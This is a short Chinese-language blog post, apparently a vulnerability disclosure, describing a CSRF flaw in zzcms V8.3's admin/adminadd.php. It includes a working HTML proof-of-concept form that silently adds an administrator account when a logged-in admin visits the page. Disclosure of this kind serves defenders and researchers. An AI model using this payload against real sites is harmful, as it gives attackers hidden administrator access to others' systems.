zzcms V8.3 CSRF(跨站请求伪造)漏洞

  • 内容
  • 相关

问题文件:

/zzcms8.3/admin/adminadd.php

漏洞分析

常见的CSRF攻击利用方式,由于管理后台设计敏感操作的表单没有设置token,导致可以使用CSRF去添加管理员

漏洞复现

POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.224.138/admin/adminadd.php?action=add" method="POST">
      <input type="hidden" name="groupid" value="1" />
      <input type="hidden" name="admins" value="123" />
      <input type="hidden" name="passs" value="123" />
      <input type="hidden" name="passs2" value="123" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

只需诱导管理员点击构造好的恶意页面,即可添加管理员

本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:zzcms V8.3 CSRF(跨站请求伪造)漏洞 - https://www.15qq.cn/bug_poc/19.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知